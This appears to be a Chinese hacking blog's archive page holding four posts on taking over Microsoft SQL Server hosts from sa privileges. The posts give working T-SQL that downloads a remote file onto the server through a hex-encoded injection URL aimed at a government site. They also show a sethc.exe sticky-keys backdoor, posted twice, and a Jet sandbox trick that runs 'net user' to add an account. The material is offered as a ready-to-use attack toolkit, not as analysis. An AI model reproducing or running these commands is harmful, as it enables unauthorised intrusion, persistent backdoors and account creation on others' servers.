存档

文章标签 ‘SA’

xml.http 下载拿SHELL

2009年7月24日 Chinadu 没有评论

注意以下语句在SA权限下执行,对于N多扩展存储过程被删除时使用效果最佳:

DECLARE
@B varbinary(8000),
@hr int,
@http INT,
@down INT
EXEC sp_oacreate [Microsoft.XMLHTTP],@http output ;EXEC @hr = sp_oamethod @http,[Open],null,[GET],[要下载的文件地址],0 ;EXEC @hr = sp_oamethod @http,[Send],null ;EXEC @hr=sp_OAGetProperty @http,[responseBody],@B output ;EXEC @hr=sp_oacreate [ADODB.Stream],@down output ;EXEC @hr=sp_OASetProperty @down,[Type],1 ;EXEC @hr=sp_OASetProperty @down,[mode],3 ;EXEC @hr=sp_oamethod @down,[Open],null ;EXEC @hr=sp_oamethod @down,[Write],null,@B ;EXEC @hr=sp_oamethod @down,[SaveToFile],null,[保存在服务器上的绝对路径],1 ;--
将以上代码修改后转化为十六进制。然后提交:
http://www.XXXX.gov.cn/XXX/hdsq/XXXXfo.jsp?ID=8 ;DECLARE @S VARCHAR(4000);SET @S=CAST(十六进制代码 AS VARCHAR(4000));EXEC(@S);--

分类: 技术文章 标签:

sa权限下无xp_cmdshell下取权限又一简单方法

2009年6月25日 Chinadu 没有评论

有了sa但无xp_cmdshell ,怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块,反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法
(很多服务器都把'wscript.shell'给删了。)
看到既然能用sp_oacreate,sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject
网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制,删除文件吧。。
上网找了些资料,得到下面方法:
复制文件:

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

成功后3389登陆按五次shift键。成功进入服务器。一直向上点"我的电脑"右键"管理" 用户管理直接加用户。
此法随无技术可言,希望对某些人有点用。

分类: 技术文章 标签:

sa 无xp_cmdshell下提限又一简单方法

2007年12月10日 Chinadu 2 条评论

有了sa但无xp_cmdshell ,怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块,反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法
(很多服务器都把'wscript.shell'给删了。)
看到既然能用sp_oacreate,sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject
网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制,删除文件吧。。
上网找了些资料,得到下面方法:
复制文件:

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out 
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

成功后3389登陆按五次shift键。成功进入服务器。一直向上点”我的电脑“右键“管理” 用户管理直接加用户。
此法随无技术可言,希望对某些人有点用。

分类: 技术文章 标签: ,

SA下不用恢复xp_cmdshell和xplog70.dll也执行命令

2007年11月18日 Chinadu 没有评论

sa下删除xp_cmdshell和xplog70.dll时候的一种办法,不算新的了,
也被一些人不断的再次提出来,
为了方便自己记忆再写出来,
在这种情况下,要执行命令,条件是要有xp_regwrite。

首先开启沙盘模式:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')

分类: 技术文章 标签: ,